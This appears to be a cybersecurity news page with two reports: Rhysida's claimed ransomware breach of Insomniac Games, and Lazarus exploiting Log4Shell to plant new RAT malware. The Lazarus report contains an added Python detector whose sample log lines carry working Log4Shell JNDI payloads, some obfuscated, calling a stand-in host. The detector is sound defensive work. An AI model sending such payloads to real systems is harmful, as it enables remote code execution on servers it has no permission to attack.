
Ransomware Gang Claims to Have Hacked Sony’s Insomniac Games

  • Written by Shipra Sanganeria, Cybersecurity & Tech Writer
  • Fact-Checked by Justyn Newman, Former Lead Cybersecurity Editor

Insomniac Games, the renowned developer of games such as Spider-Man and Spyro the Dragon, has allegedly been hacked by the ransomware gang Rhysida.

Based in Burbank, California, Insomniac Games became a part of PlayStation Studios after it was acquired by Sony Interactive Entertainment in 2019.

The gang claims to have “exclusive, unique, and impressive data” from the game developer, including US passport copies (allegedly belonging to employees), internal emails, personal data, signed confidential documents, and previews of its upcoming Wolverine game.

The gang has given Insomniac seven days to pay the ransom before it publishes the data. “With just 7 days on the clock, seize the opportunity to bid on exclusive, unique, and impressive data,” Rhysida posted on its leak site. “Open your wallets and be ready to buy exclusive data. We sell only to one hand, no reselling, you will be the only owner!”

Meanwhile, the gang has also put the stolen data up for auction, with bidding starting at 50 Bitcoin (around $2 million).

Parent company Sony, in a statement to Eurogamer, said that it is investigating the claims. “We are aware of reports that Insomniac Games has been the victim of a cyber security attack. We are currently investigating this situation. We have no reason to believe that any other SIE or Sony divisions have been impacted,” said Sony.

A relative newcomer to the ransomware scene, the group has also been linked to the high-profile breach of the British Library.

This year, Sony and its subsidiaries have been targeted by various ransomware actors. In September, two separate hackers claimed to have stolen around 3.14 GB of data from the company’s systems. Subsequently, in October 2023, reports surfaced that Sony was a victim of the MOVEit file transfer attack, which compromised the sensitive data of 6,791 people in the US.


Lazarus Hackers Exploit Log4Shell Security Flaw to Deploy New RAT Malware

  • Written by Shipra Sanganeria, Cybersecurity & Tech Writer

Hackers connected to the North Korean threat group Lazarus have been observed exploiting the Log4Shell vulnerability (CVE-2021-44228) to attack organizations worldwide.

Discovered in early 2023, the campaign, dubbed “Operation Blacksmith” by Cisco Talos researchers, is said to target manufacturing, agricultural, and physical security companies worldwide.

“Operation Blacksmith involved the exploitation of CVE-2021-44228, also known as Log4Shell, and the use of a previously unknown DLang-based RAT utilizing Telegram as its C2 channel,” the advisory disclosed.

Exploiting the Log4Shell flaw in publicly facing VMware Horizon servers, the actors deployed three novel malware families. Two of them are remote access trojans (RATs), named NineRAT and DLRAT, and the third is a malware downloader named BottomLoader. A definitive shift in Lazarus’ techniques and tools was observed, overlapping with its alleged sub-group Onyx Sleet (aka PLUTONIUM or Andariel).
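A defender reading about this campaign will want to check edge logs for Log4Shell probes against internet-facing servers. The script below is an added example, not code from Cisco Talos or from this article; it undoes the Log4j lookup tricks commonly used to disguise the `jndi` keyword and flags matching requests in a few constructed Apache-style access log entries (the IP addresses and paths are made up).

```python
import re
from urllib.parse import unquote

# Log4j lookup forms used to disguise the "jndi" keyword (resolved innermost-first):
#   ${lower:J} / ${upper:j}   -> "j"
#   ${::-j}, ${env:NOPE:-j}   -> the default value after ":-"
_CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^{}]*)\}", re.IGNORECASE)
_DEFAULT_LOOKUP = re.compile(r"\$\{[^{}]*?:-([^{}]*)\}")
_JNDI = re.compile(r"\$\{\s*jndi\s*:")


def normalize(text: str) -> str:
    """Undo URL encoding and collapse nested lookups until nothing changes."""
    text = unquote(unquote(text))  # covers single and double encoding
    previous = None
    while previous != text:
        previous = text
        text = _CASE_LOOKUP.sub(lambda m: m.group(1), text)
        text = _DEFAULT_LOOKUP.sub(lambda m: m.group(1), text)
    return text.lower()


def is_log4shell_probe(line: str) -> bool:
    """True when a request line contains a JNDI lookup after normalization."""
    return _JNDI.search(normalize(line)) is not None


def scan_access_log(lines):
    """Return (line_number, source_ip) pairs for suspicious requests."""
    hits = []
    for number, line in enumerate(lines, start=1):
        if is_log4shell_probe(line):
            hits.append((number, line.split(" ", 1)[0]))
    return hits


# Constructed Apache combined-format entries using documentation IP ranges.
SAMPLE_LOG = [
    '203.0.113.5 - - [11/Dec/2023:10:00:01 +0000] "GET /portal/ HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [11/Dec/2023:10:00:07 +0000] "GET /portal/ HTTP/1.1" 200 5123 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '203.0.113.9 - - [11/Dec/2023:10:00:09 +0000] "GET /portal/?q=%24%7B%24%7Blower%3Aj%7Dndi%3Aldap%3A//198.51.100.7/b%7D HTTP/1.1" 400 0 "-" "curl/8.0"',
    '203.0.113.9 - - [11/Dec/2023:10:00:11 +0000] "GET /portal/ HTTP/1.1" 200 5123 "-" "${${::-j}${::-n}di:rmi://198.51.100.7/c}"',
    '198.51.100.2 - - [11/Dec/2023:10:00:15 +0000] "GET /portal/?q=${date:yyyy} HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for number, ip in scan_access_log(SAMPLE_LOG):
        print(f"line {number}: possible Log4Shell probe from {ip}")
```

The last sample line shows a harmless lookup that must not be flagged; the normalizer only reports lines that still contain a `${jndi:` lookup after decoding.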

After initial reconnaissance, the hackers set up a proxy tool, “HazyLoad”, for continued access to the infected system. It was also observed that Lazarus, instead of using unauthorized domain-level user accounts, created system-level accounts with administrative privileges.

Another noted deviation in their tactics was “downloading and using credential dumping utilities such as ProcDump and MimiKatz” for hands-on-keyboard activity.

The second phase of the campaign involves the deployment of the novel NineRAT. First identified in March 2023, the DLang-based trojan uses a Telegram-based C2 channel to receive preliminary commands. The malware not only has the ability to uninstall itself from the system but can also, in some instances, re-fingerprint the system, suggesting that the data it collects may be shared by other APT groups.

“Re-fingerprinting the infected systems indicates the data collected by Lazarus via NineRAT may be shared by other APT groups and essentially resides in a different repository from the fingerprint data collected initially by Lazarus during their initial access and implant deployment phase,” Cisco concludes.